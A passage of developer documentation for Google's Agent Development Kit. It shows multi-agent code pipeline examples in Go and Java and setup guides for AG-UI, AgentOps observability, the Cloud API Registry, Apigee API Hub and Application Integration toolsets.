"CodeReviewerAgent", Model: model, Description: "Reviews code and provides feedback.", Instruction: `You are an expert Go Code Reviewer. Your task is to provide constructive feedback on the provided code. **Code to Review:** '''go {generated_code} ''' **Review Criteria:** 1. **Correctness:** Does the code work as intended? Are there logic errors? 2. **Readability:** Is the code clear and easy to understand? Follows Go style guidelines? 3. **Idiomatic Go:** Does the code use Go's features in a natural and standard way? 4. **Edge Cases:** Does the code handle potential edge cases or invalid inputs gracefully? 5. **Best Practices:** Does the code follow common Go best practices? **Output:** Provide your feedback as a concise, bulleted list. Focus on the most important points for improvement. If the code is excellent and requires no changes, simply state: "No major issues found." Output *only* the review comments or the "No major issues" statement.`, OutputKey: "review_comments", }) if err != nil { return fmt.Errorf("failed to create code reviewer agent: %v", err) } codeRefactorerAgent, err := llmagent.New(llmagent.Config{ Name: "CodeRefactorerAgent", Model: model, Description: "Refactors code based on review comments.", Instruction: `You are a Go Code Refactoring AI. Your goal is to improve the given Go code based on the provided review comments. **Original Code:** '''go {generated_code} ''' **Review Comments:** {review_comments} **Task:** Carefully apply the suggestions from the review comments to refactor the original code. If the review comments state "No major issues found," return the original code unchanged. Ensure the final code is complete, functional, and includes necessary imports. **Output:** Output *only* the final, refactored Go code block, enclosed in triple backticks ('''go ... '''). Do not add any other text before or after the code block.`, OutputKey: "refactored_code", }) if err != nil { return fmt.Errorf("failed to create code refactorer agent: %v", err) } codePipelineAgent, err := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{ Name: appName, Description: "Executes a sequence of code writing, reviewing, and refactoring.", SubAgents: []agent.Agent{ codeWriterAgent, codeReviewerAgent, codeRefactorerAgent, }, }, }) if err != nil { return fmt.Errorf("failed to create sequential agent: %v", err) } ``` ````java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.SequentialAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; public class SequentialAgentExample { private static final String APP_NAME = "CodePipelineAgent"; private static final String USER_ID = "test_user_456"; private static final String MODEL_NAME = "gemini-2.0-flash"; public static void main(String[] args) { SequentialAgentExample sequentialAgentExample = new SequentialAgentExample(); sequentialAgentExample.runAgent( "Write a Java function to calculate the factorial of a number."); } public void runAgent(String prompt) { LlmAgent codeWriterAgent = LlmAgent.builder() .model(MODEL_NAME) .name("CodeWriterAgent") .description("Writes initial Java code based on a specification.") .instruction( """ You are a Java Code Generator. Based *only* on the user's request, write Java code that fulfills the requirement. Output *only* the complete Java code block, enclosed in triple backticks (```java ... ```). Do not add any other text before or after the code block. """) .outputKey("generated_code") .build(); LlmAgent codeReviewerAgent = LlmAgent.builder() .model(MODEL_NAME) .name("CodeReviewerAgent") .description("Reviews code and provides feedback.") .instruction( """ You are an expert Java Code Reviewer. Your task is to provide constructive feedback on the provided code. **Code to Review:** ```java {generated_code} ``` **Review Criteria:** 1. **Correctness:** Does the code work as intended? Are there logic errors? 2. **Readability:** Is the code clear and easy to understand? Follows Java style guidelines? 3. **Efficiency:** Is the code reasonably efficient? Any obvious performance bottlenecks? 4. **Edge Cases:** Does the code handle potential edge cases or invalid inputs gracefully? 5. **Best Practices:** Does the code follow common Java best practices? **Output:** Provide your feedback as a concise, bulleted list. Focus on the most important points for improvement. If the code is excellent and requires no changes, simply state: "No major issues found." Output *only* the review comments or the "No major issues" statement. """) .outputKey("review_comments") .build(); LlmAgent codeRefactorerAgent = LlmAgent.builder() .model(MODEL_NAME) .name("CodeRefactorerAgent") .description("Refactors code based on review comments.") .instruction( """ You are a Java Code Refactoring AI. Your goal is to improve the given Java code based on the provided review comments. **Original Code:** ```java {generated_code} ``` **Review Comments:** {review_comments} **Task:** Carefully apply the suggestions from the review comments to refactor the original code. If the review comments state "No major issues found," return the original code unchanged. Ensure the final code is complete, functional, and includes necessary imports and docstrings. **Output:** Output *only* the final, refactored Java code block, enclosed in triple backticks (```java ... ```). Do not add any other text before or after the code block. """) .outputKey("refactored_code") .build(); SequentialAgent codePipelineAgent = SequentialAgent.builder() .name(APP_NAME) .description("Executes a sequence of code writing, reviewing, and refactoring.") // The agents will run in the order provided: Writer -> Reviewer -> Refactorer .subAgents(codeWriterAgent, codeReviewerAgent, codeRefactorerAgent) .build(); // Create an InMemoryRunner InMemoryRunner runner = new InMemoryRunner(codePipelineAgent, APP_NAME); // InMemoryRunner automatically creates a session service. Create a session using the service Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet(); Content userMessage = Content.fromParts(Part.fromText(prompt)); // Run the agent Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } ```` # Tools and Integrations for Agents Check out the following pre-built tools and integrations that you can use with ADK agents. For information on building custom tools, see [Custom Tools](/adk-docs/tools-custom/). For information on submitting integrations to the catalog, see the [Contribution Guide for Integrations](https://github.com/google/adk-docs/blob/main/CONTRIBUTING.md#integrations). Filter: All Code Connectors Data Google MCP Observability Search # AG-UI user interface for ADK Supported in ADKPythonTypeScriptGoJava Turn your ADK agents into full-featured applications with rich, responsive UIs. [AG-UI](https://docs.ag-ui.com/) is an open protocol that handles streaming events, client state, and bi-directional communication between your agents and users. [AG-UI](https://github.com/ag-ui-protocol/ag-ui) provides a consistent interface to empower rich clients across technology stacks, from mobile to the web and even the command line. There are a number of different clients that support AG-UI: - [CopilotKit](https://copilotkit.ai) provides tooling and components to tightly integrate your agent with web applications - Clients for [Kotlin](https://github.com/ag-ui-protocol/ag-ui/tree/main/sdks/community/kotlin), [Java](https://github.com/ag-ui-protocol/ag-ui/tree/main/sdks/community/java), [Go](https://github.com/ag-ui-protocol/ag-ui/tree/main/sdks/community/go/example/client), and [CLI implementations](https://github.com/ag-ui-protocol/ag-ui/tree/main/apps/client-cli-example/src) in TypeScript This tutorial uses CopilotKit to create a sample app backed by an ADK agent that demonstrates some of the features supported by AG-UI. ## Quickstart To get started, let's create a sample application with an ADK agent and a simple web client: 1. Create the app: ```bash npx copilotkit@latest create -f adk ``` 1. Set your Google API key: ```bash export GOOGLE_API_KEY="your-api-key" ``` 1. Install dependencies and run: ```bash npm install && npm run dev ``` This starts two servers: - **http://localhost:3000** - The web UI (open this in your browser) - **http://localhost:8000** - The ADK agent API (backend only) Open in your browser to chat with your agent. ## Features ### Chat Chat is a familiar interface for exposing your agent, and AG-UI handles streaming messages between your users and agents: src/app/page.tsx ```tsx ``` Learn more about the chat UI [in the CopilotKit docs](https://docs.copilotkit.ai/adk/agentic-chat-ui). ### Generative UI AG-UI lets you share tool information with a Generative UI so that it can be displayed to users: src/app/page.tsx ```tsx useRenderToolCall( { name: "get_weather", description: "Get the weather for a given location.", parameters: [{ name: "location", type: "string", required: true }], render: ({ args }) => { return ; }, }, [themeColor], ); ``` Learn more about Generative UI [in the CopilotKit docs](https://docs.copilotkit.ai/adk/generative-ui). ### Shared State ADK agents can be stateful, and synchronizing that state between your agents and your UIs enables powerful and fluid user experiences. State can be synchronized both ways so agents are automatically aware of changes made by your user or other parts of your application: src/app/page.tsx ```tsx const { state, setState } = useCoAgent({ name: "my_agent", initialState: { proverbs: [ "A journey of a thousand miles begins with a single step.", ], }, }) ``` Learn more about shared state [in the CopilotKit docs](https://docs.copilotkit.ai/adk/shared-state). ## Resources To see what other features you can build into your UI with AG-UI, refer to the CopilotKit docs: - [Agentic Generative UI](https://docs.copilotkit.ai/adk/generative-ui/agentic) - [Human in the Loop](https://docs.copilotkit.ai/adk/human-in-the-loop) - [Frontend Actions](https://docs.copilotkit.ai/adk/frontend-actions) Or try them out in the [AG-UI Dojo](https://dojo.ag-ui.com). # AgentOps observability for ADK Supported in ADKPython **With just two lines of code**, [AgentOps](https://www.agentops.ai) provides session replays, metrics, and monitoring for agents. ## Why AgentOps for ADK? Observability is a key aspect of developing and deploying conversational AI agents. It allows developers to understand how their agents are performing, how their agents are interacting with users, and how their agents use external tools and APIs. By integrating AgentOps, developers can gain deep insights into their ADK agent's behavior, LLM interactions, and tool usage. Google ADK includes its own OpenTelemetry-based tracing system, primarily aimed at providing developers with a way to trace the basic flow of execution within their agents. AgentOps enhances this by offering a dedicated and more comprehensive observability platform with: - **Unified Tracing and Replay Analytics:** Consolidate traces from ADK and other components of your AI stack. - **Rich Visualization:** Intuitive dashboards to visualize agent execution flow, LLM calls, and tool performance. - **Detailed Debugging:** Drill down into specific spans, view prompts, completions, token counts, and errors. - **LLM Cost and Latency Tracking:** Track latencies, costs (via token usage), and identify bottlenecks. - **Simplified Setup:** Get started with just a few lines of code. *AgentOps dashboard displaying a trace from a multi-step ADK application execution. You can see the hierarchical structure of spans, including the main agent workflow, individual sub-agents, LLM calls, and tool executions. Note the clear hierarchy: the main workflow agent span contains child spans for various sub-agent operations, LLM calls, and tool executions.* ## Getting Started with AgentOps and ADK Integrating AgentOps into your ADK application is straightforward: 1. **Install AgentOps:** ```bash pip install -U agentops ``` 1. **Create an API Key** Create a user API key here: [Create API Key](https://app.agentops.ai/settings/projects) and configure your environment: Add your API key to your environment variables: ```text AGENTOPS_API_KEY= ``` 1. **Initialize AgentOps:** Add the following lines at the beginning of your ADK application script (e.g., your main Python file running the ADK `Runner`): ```python import agentops agentops.init() ``` This will initiate an AgentOps session as well as automatically track ADK agents. Detailed example: ```python import agentops import os from dotenv import load_dotenv # Load environment variables (optional, if you use a .env file for API keys) load_dotenv() agentops.init( api_key=os.getenv("AGENTOPS_API_KEY"), # Your AgentOps API Key trace_name="my-adk-app-trace" # Optional: A name for your trace # auto_start_session=True is the default. # Set to False if you want to manually control session start/end. ) ``` > 🚨 🔑 You can find your AgentOps API key on your [AgentOps Dashboard](https://app.agentops.ai/) after signing up. It's recommended to set it as an environment variable (`AGENTOPS_API_KEY`). Once initialized, AgentOps will automatically begin instrumenting your ADK agent. **This is all you need to capture all telemetry data for your ADK agent** ## How AgentOps Instruments ADK AgentOps employs a sophisticated strategy to provide seamless observability without conflicting with ADK's native telemetry: 1. **Neutralizing ADK's Native Telemetry:** AgentOps detects ADK and intelligently patches ADK's internal OpenTelemetry tracer (typically `trace.get_tracer('gcp.vertex.agent')`). It replaces it with a `NoOpTracer`, ensuring that ADK's own attempts to create telemetry spans are effectively silenced. This prevents duplicate traces and allows AgentOps to be the authoritative source for observability data. 1. **AgentOps-Controlled Span Creation:** AgentOps takes control by wrapping key ADK methods to create a logical hierarchy of spans: - **Agent Execution Spans (e.g., `adk.agent.MySequentialAgent`):** When an ADK agent (like `BaseAgent`, `SequentialAgent`, or `LlmAgent`) starts its `run_async` method, AgentOps initiates a parent span for that agent's execution. - **LLM Interaction Spans (e.g., `adk.llm.gemini-pro`):** For calls made by an agent to an LLM (via ADK's `BaseLlmFlow._call_llm_async`), AgentOps creates a dedicated child span, typically named after the LLM model. This span captures request details (prompts, model parameters) and, upon completion (via ADK's `_finalize_model_response_event`), records response details like completions, token usage, and finish reasons. - **Tool Usage Spans (e.g., `adk.tool.MyCustomTool`):** When an agent uses a tool (via ADK's `functions.__call_tool_async`), AgentOps creates a single, comprehensive child span named after the tool. This span includes the tool's input parameters and the result it returns. 1. **Rich Attribute Collection:** AgentOps reuses ADK's internal data extraction logic. It patches ADK's specific telemetry functions (e.g., `google.adk.telemetry.trace_tool_call`, `trace_call_llm`). The AgentOps wrappers for these functions take the detailed information ADK gathers and attach it as attributes to the *currently active AgentOps span*. ## Visualizing Your ADK Agent in AgentOps When you instrument your ADK application with AgentOps, you gain a clear, hierarchical view of your agent's execution in the AgentOps dashboard. 1. **Initialization:** When `agentops.init()` is called (e.g., `agentops.init(trace_name="my_adk_application")`), an initial parent span is created if the init param `auto_start_session=True` (true by default). This span, often named similar to `my_adk_application.session`, will be the root for all operations within that trace. 1. **ADK Runner Execution:** When an ADK `Runner` executes a top-level agent (e.g., a `SequentialAgent` orchestrating a workflow), AgentOps creates a corresponding agent span under the session trace. This span will reflect the name of your top-level ADK agent (e.g., `adk.agent.YourMainWorkflowAgent`). 1. **Sub-Agent and LLM/Tool Calls:** As this main agent executes its logic, including calling sub-agents, LLMs, or tools: - Each **sub-agent execution** will appear as a nested child span under its parent agent. - Calls to **Large Language Models** will generate further nested child spans (e.g., `adk.llm.`), capturing prompt details, responses, and token usage. - **Tool invocations** will also result in distinct child spans (e.g., `adk.tool.`), showing their parameters and results. This creates a waterfall of spans, allowing you to see the sequence, duration, and details of each step in your ADK application. All relevant attributes, such as LLM prompts, completions, token counts, tool inputs/outputs, and agent names, are captured and displayed. For a practical demonstration, you can explore a sample Jupyter Notebook that illustrates a human approval workflow using Google ADK and AgentOps: [Google ADK Human Approval Example on GitHub](https://github.com/AgentOps-AI/agentops/blob/main/examples/google_adk/human_approval.ipynb). This example showcases how a multi-step agent process with tool usage is visualized in AgentOps. ## Benefits - **Effortless Setup:** Minimal code changes for comprehensive ADK tracing. - **Deep Visibility:** Understand the inner workings of complex ADK agent flows. - **Faster Debugging:** Quickly pinpoint issues with detailed trace data. - **Performance Optimization:** Analyze latencies and token usage. By integrating AgentOps, ADK developers can significantly enhance their ability to build, debug, and maintain robust AI agents. ## Further Information To get started, [create an AgentOps account](http://app.agentops.ai). For feature requests or bug reports, please reach out to the AgentOps team on the [AgentOps Repo](https://github.com/AgentOps-AI/agentops). ### Extra links 🐦 [Twitter](http://x.com/agentopsai) • 📢 [Discord](http://x.com/agentopsai) • 🖇️ [AgentOps Dashboard](http://app.agentops.ai) • 📙 [Documentation](http://docs.agentops.ai) # Google Cloud API Registry tool for ADK Supported in ADKPython v1.20.0Preview The Google Cloud API Registry connector tool for Agent Development Kit (ADK) lets you access a wide range of Google Cloud services for your agents as Model Context Protocol (MCP) servers through the [Google Cloud API Registry](https://docs.cloud.google.com/api-registry/docs/overview). You can configure this tool to connect your agent to your Google Cloud projects and dynamically access Cloud services enabled for that project. Preview release The Google Cloud API Registry feature is a Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages). ## Prerequisites Before using the API Registry with your agent, you need to ensure the following: - **Google Cloud project:** Configure your agent to access AI models using an existing Google Cloud project. - **API Registry access:** The environment where your agent runs needs Google Cloud [Application Default Credentials](https://docs.cloud.google.com/docs/authentication/provide-credentials-adc) with the `apiregistry.viewer` role to list available MCP servers. - **Cloud APIs:** In your Google Cloud project, enable the *cloudapiregistry.googleapis.com* and *apihub.googleapis.com* Google Cloud APIs. - **MCP Server and Tool access:** Make sure you enable the MCP Servers in the API Registry for the Google Cloud services in your Cloud Project that you want access with your agent. You can enable this in the Cloud Console or use a gcloud command such as: `gcloud beta api-registry mcp enable bigquery.googleapis.com --project={PROJECT_ID}`. The credentials used by the agent must have permissions to access the MCP server and the underlying services used by the tools. For example, to use BigQuery tools, the service account needs BigQuery IAM roles like `bigquery.dataViewer` and `bigquery.jobUser`. For more information about required permissions, see [Authentication and access](#auth). You can check what MCP servers are enabled with API Registry using the following gcloud command: ```console gcloud beta api-registry mcp servers list --project={PROJECT_ID}. ``` ## Use with agent When configuring the API Registry connector tool with an agent, you first initialize the ***ApiRegistry*** class to establish a connection with Cloud services, and then use the `get_toolset()` function to retrieve a toolset for a specific MCP server registered in the API Registry. The following code example demonstrates how to create an agent that uses tools from an MCP server listed in API Registry. This agent is designed to interact with BigQuery: ```python import os from google.adk.agents.llm_agent import LlmAgent from google.adk.tools.api_registry import ApiRegistry # Configure with your Google Cloud Project ID and registered MCP server name PROJECT_ID = "your-google-cloud-project-id" MCP_SERVER_NAME = "projects/your-google-cloud-project-id/locations/global/mcpServers/your-mcp-server-name" # Example header provider for BigQuery, a project header is required. def header_provider(context): return {"x-goog-user-project": PROJECT_ID} # Initialize ApiRegistry api_registry = ApiRegistry( api_registry_project_id=PROJECT_ID, header_provider=header_provider ) # Get the toolset for the specific MCP server registry_tools = api_registry.get_toolset( mcp_server_name=MCP_SERVER_NAME, # Optionally filter tools: #tool_filter=["list_datasets", "run_query"] ) # Create an agent with the tools root_agent = LlmAgent( model="gemini-1.5-flash", # Or your preferred model name="bigquery_assistant", instruction=""" Help user access their BigQuery data using the available tools. """, tools=[registry_tools], ) ``` For the complete code for this example, see the [api_registry_agent](https://github.com/google/adk-python/tree/main/contributing/samples/api_registry_agent/) sample. For information on the configuration options, see [Configuration](#configuration). For information on the authentication for this tool, see [Authentication and access](#auth). ## Authentication and access Using the API Registry with your agent requires authentication for the services the agent accesses. By default the tool uses Google Cloud [Application Default Credentials](https://docs.cloud.google.com/docs/authentication/provide-credentials-adc) for authentication. When using this tool make sure your agent has the following permissions and access: - **API Registry access:** The `ApiRegistry` class uses Application Default Credentials (`google.auth.default()`) to authenticate requests to the Google Cloud API Registry to list the available MCP servers. Ensure the environment where the agent runs has credentials with the necessary permissions to view the API Registry resources, such as `apiregistry.viewer`. - **MCP Server and Tool access:** The `McpToolset` returned by `get_toolset` also uses the Google Cloud Application Default Credentials by default to authenticate calls to the actual MCP server endpoint. The credentials used must have the necessary permissions for both: 1. Accessing the MCP server itself. 1. Utilizing the underlying services and resources that the tools interact with. - **MCP Tool user role:** Allow the account used by your agent to call MCP tools through the API registry by granting the MCP tool user role: `gcloud projects add-iam-policy-binding {PROJECT_ID} --member={member} --role="roles/mcp.toolUser"` For example, when using MCP server tools that interact with BigQuery, the account associated with the credentials, such as a service account, must be granted appropriate BigQuery IAM roles, such as `bigquery.dataViewer` or `bigquery.jobUser`, within your Google Cloud project to access datasets and run queries. In the case of the bigquery MCP server, a `"x-goog-user-project": PROJECT_ID` header is required to use its tools Additional headers for authentication or project context can be injected via the `header_provider` argument in the `ApiRegistry` constructor. ## Configuration The ***APIRegistry*** object has the following configuration options: - **`api_registry_project_id`** (str): The Google Cloud Project ID where the API Registry is located. - **`location`** (str, optional): The location of the API Registry resources. Defaults to `"global"`. - **`header_provider`** (Callable, optional): A function that takes the call context and returns a dictionary of additional HTTP headers to be sent with requests to the MCP server. This is often used for dynamic authentication or project-specific headers. The `get_toolset()` function has the following configuration options: - **`mcp_server_name`** (str): The full name of the registered MCP server from which to load tools, for example: `projects/my-project/locations/global/mcpServers/my-server`. - **`tool_filter`** (Union\[ToolPredicate, List[str]\], optional): Specifies which tools to include in the toolset. - If a list of strings, only tools with names in the list are included. - If a `ToolPredicate` function, the function is called for each tool, and only tools for which it returns `True` are included. - If `None`, all tools from the MCP server are included. - **`tool_name_prefix`** (str, optional): A prefix to add to the name of each tool in the resulting toolset. ## Additional resources - [api_registry_agent](https://github.com/google/adk-python/tree/main/contributing/samples/api_registry_agent/) ADK code sample - [Google Cloud API Registry](https://docs.cloud.google.com/api-registry/docs/overview) documentation # Apigee API Hub tool for ADK Supported in ADKPython v0.1.0 **ApiHubToolset** lets you turn any documented API from Apigee API hub into a tool with a few lines of code. This section shows you the step-by-step instructions including setting up authentication for a secure connection to your APIs. **Prerequisites** 1. [Install ADK](/adk-docs/get-started/installation/) 1. Install the [Google Cloud CLI](https://cloud.google.com/sdk/docs/install?db=bigtable-docs#installation_instructions). 1. [Apigee API hub](https://cloud.google.com/apigee/docs/apihub/what-is-api-hub) instance with documented (i.e. OpenAPI spec) APIs 1. Set up your project structure and create required files ```console project_root_folder | `-- my_agent |-- .env |-- __init__.py |-- agent.py `__ tool.py ``` ## Create an API Hub Toolset Note: This tutorial includes an agent creation. If you already have an agent, you only need to follow a subset of these steps. 1. Get your access token, so that APIHubToolset can fetch spec from API Hub API. In your terminal run the following command ```shell gcloud auth print-access-token # Prints your access token like 'ya29....' ``` 1. Ensure that the account used has the required permissions. You can use the pre-defined role `roles/apihub.viewer` or assign the following permissions: 1. **apihub.specs.get (required)** 1. apihub.apis.get (optional) 1. apihub.apis.list (optional) 1. apihub.versions.get (optional) 1. apihub.versions.list (optional) 1. apihub.specs.list (optional) 1. Create a tool with `APIHubToolset`. Add the below to `tools.py` If your API requires authentication, you must configure authentication for the tool. The following code sample demonstrates how to configure an API key. ADK supports token based auth (API Key, Bearer token), service account, and OpenID Connect. We will soon add support for various OAuth2 flows. ```py from google.adk.tools.openapi_tool.auth.auth_helpers import token_to_scheme_credential from google.adk.tools.apihub_tool.apihub_toolset import APIHubToolset # Provide authentication for your APIs. Not required if your APIs don't required authentication. auth_scheme, auth_credential = token_to_scheme_credential( "apikey", "query", "apikey", apikey_credential_str ) sample_toolset = APIHubToolset( name="apihub-sample-tool", description="Sample Tool", access_token="...", # Copy your access token generated in step 1 apihub_resource_name="...", # API Hub resource name auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` For production deployment we recommend using a service account instead of an access token. In the code snippet above, use `service_account_json=service_account_cred_json_str` and provide your security account credentials instead of the token. For apihub_resource_name, if you know the specific ID of the OpenAPI Spec being used for your API, use `` `projects/my-project-id/locations/us-west1/apis/my-api-id/versions/version-id/specs/spec-id` ``. If you would like the Toolset to automatically pull the first available spec from the API, use `` `projects/my-project-id/locations/us-west1/apis/my-api-id` `` 1. Create your agent file Agent.py and add the created tools to your agent definition: ```py from google.adk.agents.llm_agent import LlmAgent from .tools import sample_toolset root_agent = LlmAgent( model='gemini-2.0-flash', name='enterprise_assistant', instruction='Help user, leverage the tools you have access to', tools=sample_toolset.get_tools(), ) ``` 1. Configure your `__init__.py` to expose your agent ```py from . import agent ``` 1. Start the Google ADK Web UI and try your agent: ```shell # make sure to run `adk web` from your project_root_folder adk web ``` Then go to to try your agent from the Web UI. # Google Cloud Application Integration tool for ADK Supported in ADKPython v0.1.0Java v0.3.0 With **ApplicationIntegrationToolset**, you can seamlessly give your agents secure and governed access to enterprise applications using Integration Connectors' 100+ pre-built connectors for systems like Salesforce, ServiceNow, JIRA, SAP, and more. It supports both on-premise and SaaS applications. In addition, you can turn your existing Application Integration process automations into agentic workflows by providing application integration workflows as tools to your ADK agents. Federated search within Application Integration lets you use ADK agents to query multiple enterprise applications and data sources simultaneously. [See how ADK Federated Search in Application Integration works in this video walkthrough](https://www.youtube.com/watch?v=JdlWOQe5RgU) ## Prerequisites ### 1. Install ADK Install Agent Development Kit following the steps in the [installation guide](/adk-docs/get-started/installation/). ### 2. Install CLI Install the [Google Cloud CLI](https://cloud.google.com/sdk/docs/install#installation_instructions). To use the tool with default credentials, run the following commands: ```shell gcloud config set project gcloud auth application-default login gcloud auth application-default set-quota-project ``` Replace `` with the unique ID of your Google Cloud project. ### 3. Provision Application Integration workflow and publish Connection Tool Use an existing [Application Integration](https://cloud.google.com/application-integration/docs/overview) workflow or [Integrations Connector](https://cloud.google.com/integration-connectors/docs/overview) connection you want to use with your agent. You can also create a new [Application Integration workflow](https://cloud.google.com/application-integration/docs/setup-application-integration) or a [connection](https://cloud.google.com/integration-connectors/docs/connectors/neo4j/configure#configure-the-connector). Import and publish the [Connection Tool](https://console.cloud.google.com/integrations/templates/connection-tool/locations/global) from the template library. **Note**: To use a connector from Integration Connectors, you need to provision the Application Integration in the same region as your connection. ### 4. Create project structure Set up your project structure and create the required files: ```console project_root_folder ├── .env └── my_agent ├── __init__.py ├── agent.py └── tools.py ``` When running the agent, make sure to run `adk web` from the `project_root_folder`. Set up your project structure and create the required files: ```console project_root_folder └── my_agent ├── agent.java └── pom.xml ``` When running the agent, make sure to run the commands from the `project_root_folder`. ### 5. Set roles and permissions To get the permissions that you need to set up **ApplicationIntegrationToolset**, you must have the following IAM roles on the project (common to both Integration Connectors and Application Integration Workflows): ```text - roles/integrations.integrationEditor - roles/connectors.invoker - roles/secretmanager.secretAccessor ``` **Note:** When using Agent Engine (AE) for deployment, don't use `roles/integrations.integrationInvoker`, as it can result in 403 errors. Use `roles/integrations.integrationEditor` instead. ## Use Integration Connectors Connect your agent to enterprise applications using [Integration Connectors](https://cloud.google.com/integration-connectors/docs/overview). ### Before you begin **Note:** The *ExecuteConnection* integration is typically created automatically when you provision Application Integration in a given region. If the *ExecuteConnection* doesn't exist in the [list of integrations](https://console.cloud.google.com/integrations/list), you must follow these steps to create it: 1. To use a connector from Integration Connectors, click **QUICK SETUP** and [provision](https://console.cloud.google.com/integrations) Application Integration in the same region as your connection. 1. Go to the [Connection Tool](https://console.cloud.google.com/integrations/templates/connection-tool/locations/us-central1) template in the template library and click **USE TEMPLATE**. 1. Enter the Integration Name as *ExecuteConnection* (it is mandatory to use this exact integration name only). Then, select the region to match your connection region and click **CREATE**. 1. Click **PUBLISH** to publish the integration in the *Application Integration* editor. ### Create an Application Integration Toolset To create an Application Integration Toolset for Integration Connectors, follow these steps: 1. Create a tool with `ApplicationIntegrationToolset` in the `tools.py` file: ```py from google.adk.tools.application_integration_tool.application_integration_toolset import ApplicationIntegrationToolset connector_tool = ApplicationIntegrationToolset( project="test-project", # TODO: replace with GCP project of the connection location="us-central1", #TODO: replace with location of the connection connection="test-connection", #TODO: replace with connection name entity_operations={"Entity_One": ["LIST","CREATE"], "Entity_Two": []},#empty list for actions means all operations on the entity are supported. actions=["action1"], #TODO: replace with actions service_account_json='{...}', # optional. Stringified json for service account key tool_name_prefix="tool_prefix2", tool_instructions="..." ) ``` **Note:** - You can provide a service account to be used instead of default credentials by generating a [Service Account Key](https://cloud.google.com/iam/docs/keys-create-delete#creating), and providing the right [Application Integration and Integration Connector IAM roles](#prerequisites) to the service account. - To find the list of supported entities and actions for a connection, use the Connectors APIs: [listActions](https://cloud.google.com/integration-connectors/docs/reference/rest/v1/projects.locations.connections.connectionSchemaMetadata/listActions) or [listEntityTypes](https://cloud.google.com/integration-connectors/docs/reference/rest/v1/projects.locations.connections.connectionSchemaMetadata/listEntityTypes). `ApplicationIntegrationToolset` supports `auth_scheme` and `auth_credential` for **dynamic OAuth2 authentication** for Integration Connectors. To use it, create a tool similar to this in the `tools.py` file: ```py from google.adk.tools.application_integration_tool.application_integration_toolset import ApplicationIntegrationToolset from google.adk.tools.openapi_tool.auth.auth_helpers import dict_to_auth_scheme from google.adk.auth import AuthCredential from google.adk.auth import AuthCredentialTypes from google.adk.auth import OAuth2Auth oauth2_data_google_cloud = { "type": "oauth2", "flows": { "authorizationCode": { "authorizationUrl": "https://accounts.google.com/o/oauth2/auth", "tokenUrl": "https://oauth2.googleapis.com/token", "scopes": { "https://www.googleapis.com/auth/cloud-platform": ( "View and manage your data across Google Cloud Platform" " services" ), "https://www.googleapis.com/auth/calendar.readonly": "View your calendars" }, } }, } oauth_scheme = dict_to_auth_scheme(oauth2_data_google_cloud) auth_credential = AuthCredential( auth_type=AuthCredentialTypes.OAUTH2, oauth2=OAuth2Auth( client_id="...", #TODO: replace with client_id client_secret="...", #TODO: replace with client_secret ), ) connector_tool = ApplicationIntegrationToolset( project="test-project", # TODO: replace with GCP project of the connection location="us-central1", #TODO: replace with location of the connection connection="test-connection", #TODO: replace with connection name entity_operations={"Entity_One": ["LIST","CREATE"], "Entity_Two": []},#empty list for actions means all operations on the entity are supported. actions=["GET_calendars/%7BcalendarId%7D/events"], #TODO: replace with actions. this one is for list events service_account_json='{...}', # optional. Stringified json for service account key tool_name_prefix="tool_prefix2", tool_instructions="...", auth_scheme=oauth_scheme, auth_credential=auth_credential ) ``` 1. Update the `agent.py` file and add tool to your agent: ```py from google.adk.agents.llm_agent import LlmAgent from .tools import connector_tool root_agent = LlmAgent( model='gemini-2.0-flash', name='connector_agent', instruction="Help user, leverage the tools you have access to", tools=[connector_tool], ) ``` 1. Configure `__init__.py` to expose your agent: ```py from . import agent ``` 1. Start the Google ADK Web UI and use your agent: ```shell # make sure to run `adk web` from your project_root_folder adk web ``` After completing the above steps, go to , and choose `my\_agent` agent (which is the same as the agent folder name). ## Use Application Integration Workflows Use an existing [Application Integration](https://cloud.google.com/application-integration/docs/overview) workflow as a tool for your agent or create a new one. ### 1. Create a tool To create a tool with `ApplicationIntegrationToolset` in the `tools.py` file, use the following code: ```py integration_tool = ApplicationIntegrationToolset( project="test-project", # TODO: replace with GCP project of the connection location="us-central1", #TODO: replace with location of the connection integration="test-integration", #TODO: replace with integration name triggers=["api_trigger/test_trigger"],#TODO: replace with trigger id(s). Empty list would mean all api triggers in the integration to be considered. service_account_json='{...}', #optional. Stringified json for service account key tool_name_prefix="tool_prefix1", tool_instructions="..." ) ``` **Note:** You can provide a service account to be used instead of using default credentials. To do this, generate a [Service Account Key](https://cloud.google.com/iam/docs/keys-create-delete#creating) and provide the correct [Application Integration and Integration Connector IAM roles](#prerequisites) to the service account. For more details about the IAM roles, refer to the [Prerequisites](#prerequisites) section. To create a tool with `ApplicationIntegrationToolset` in the `tools.java` file, use the following code: ```java import com.google.adk.tools.applicationintegrationtoolset.ApplicationIntegrationToolset; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableMap; public class Tools { private static ApplicationIntegrationToolset integrationTool; private static ApplicationIntegrationToolset connectionsTool; static { integrationTool = new ApplicationIntegrationToolset( "test-project", "us-central1", "test-integration", ImmutableList.of("api_trigger/test-api"), null, null, null, "{...}", "tool_prefix1", "..."); connectionsTool = new ApplicationIntegrationToolset( "test-project", "us-central1", null, null, "test-connection", ImmutableMap.of("Issue", ImmutableList.of("GET")), ImmutableList.of("ExecuteCustomQuery"), "{...}", "tool_prefix", "..."); } } ``` **Note:** You can provide a service account to be used instead of using default credentials. To do this, generate a [Service Account Key](https://cloud.google.com/iam/docs/keys-create-delete#creating) and provide the correct [Application Integration and Integration Connector IAM roles](#prerequisites) to the service account. For more details about the IAM roles, refer to the [Prerequisites](#prerequisites) section. ### 2. Add the tool to your agent To update the `agent.py` file and add the tool to your agent, use the following code: ```py from google.adk.agents.llm_agent import LlmAgent from .tools import integration_tool, connector_tool root_agent = LlmAgent( model='gemini-2.0-flash', name='integration_agent', instruction="Help user, leverage the tools you have access to", tools=[integration_tool], ) ``` To update the `agent.java` file and add the tool to your agent, use the following code: ````java import com.google.adk.agent.LlmAgent; import 